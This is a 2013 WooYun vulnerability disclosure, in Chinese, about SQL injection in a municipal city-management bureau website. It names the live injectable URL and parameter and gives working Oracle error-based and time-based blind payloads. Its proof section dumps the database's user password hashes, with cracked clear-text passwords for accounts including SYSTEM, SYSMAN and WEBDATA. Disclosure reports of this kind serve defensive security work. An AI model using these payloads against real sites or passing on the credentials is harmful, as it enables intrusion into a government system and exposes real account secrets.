当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037777

漏洞标题:某市城市管理局网站sql注入漏洞

相关厂商:某市政府

漏洞作者: 继续堕落

提交时间:2013-09-22 17:26

修复时间:2013-11-06 17:27

公开时间:2013-11-06 17:27

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-22: 细节已通知厂商并且等待厂商处理中
2013-09-26: 厂商已经确认,细节仅向厂商公开
2013-10-06: 细节向核心白帽子及相关领域专家公开
2013-10-16: 细节向普通白帽子公开
2013-10-26: 细节向实习白帽子公开
2013-11-06: 细节向公众公开

简要描述:

系统存在sql注入漏洞,可以获取后台数据

详细说明:

注入点:http://www.wuhusrj.gov.cn/NewsDetail.aspx?pNewID=4764776
------------------------------------------------------------------------
Place: GET
Parameter: pNewID
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: pNewID=4764776' AND 4745=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(108)||CHR(99)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (4745=4745) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(97)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'PGcZ'='PGcZ
Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: pNewID=4764776' AND 1985=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(67)||CHR(122)||CHR(79),5) AND 'xWjW'='xWjW
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
--------------------------------------------------------------------------------
current user: 'WEBDATA'
current user is DBA: True
-------------------------------------------------------------------------------

漏洞证明:

database management system users password hashes:
[*] _NEXT_USER [1]:
    password hash: NULL
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] AUTHENTICATEDUSER [1]:
    password hash: NULL
[*] BASEGZDC [1]:
    password hash: 95E78B1B9CCE387E
    clear-text password: 1
[*] CONNECT [1]:
    password hash: NULL
[*] CTXAPP [1]:
    password hash: NULL
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
    clear-text password: CHANGE_ON_INSTALL
[*] DBA [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: 097AFDD678B21C67
    clear-text password: WEBDATA
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
    clear-text password: DIP
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
    clear-text password: DMSYS
[*] EJBCLIENT [1]:
    password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
    clear-text password: EXFSYS
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] GPSUSER [1]:
    password hash: BB26A08707C2F5AB
[*] GZDC [1]:
    password hash: A6A996B7E855E1F4
    clear-text password: 1
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] JAVA_ADMIN [1]:
    password hash: NULL
[*] JAVA_DEPLOY [1]:
    password hash: NULL
[*] JAVADEBUGPRIV [1]:
    password hash: NULL
[*] JAVAIDPRIV [1]:
    password hash: NULL
[*] JAVASYSPRIV [1]:
    password hash: NULL
[*] JAVAUSERPRIV [1]:
    password hash: NULL
[*] JKSOFT [1]:
    password hash: A5D2062BEFFB9AFC
    clear-text password: SYSTEM
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
    clear-text password: MDDATA
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
    clear-text password: MDSYS
[*] MGMT_USER [1]:
    password hash: NULL
[*] MGMT_VIEW [1]:
    password hash: F25A184809D6458D
[*] OATOBHL [1]:
    password hash: 3D873946BF24D674
[*] OEM_ADVISOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OLAP_DBA [1]:
    password hash: NULL
[*] OLAP_USER [1]:
    password hash: NULL
[*] OLAPSYS [1]:
    password hash: 3FB8EF9DB538647C
    clear-text password: MANAGER
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
    clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
    clear-text password: ORDSYS
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
    clear-text password: OUTLN
[*] PUBLIC [1]:
    password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] RXBASEOA [1]:
    password hash: 80662CEAC69A6E8C
    clear-text password: RXBASEOA
[*] RXOA [1]:
    password hash: 135DD9BC04309D16
    clear-text password: RXOA
[*] SCHEDULER_ADMIN [1]:
    password hash: NULL
[*] SCOTT [1]:
    password hash: F894844C34402B67
    clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
    clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
    password hash: B572EDCB29ABA573
[*] SYSMAN [1]:
    password hash: 2399DA1EA9102DD3
    clear-text password: WEBDATA
[*] SYSTEM [1]:
    password hash: 7F51C29662159C43
    clear-text password: WEBDATA
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
    clear-text password: TSMSYS
[*] WEBDATA [1]:
    password hash: A684EE76E2585767
    clear-text password: WEBDATA
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
    clear-text password: WMSYS
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
    clear-text password: CHANGE_ON_INSTALL
[*] XDBADMIN [1]:
    password hash: NULL
[*] XDBWEBSERVICES [1]:
    password hash: NULL

修复方案:

sql注入都一样了。。。。参数检查吧。。。

版权声明:转载请注明来源 继续堕落@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-26 22:44

厂商回复:

最新状态:

暂无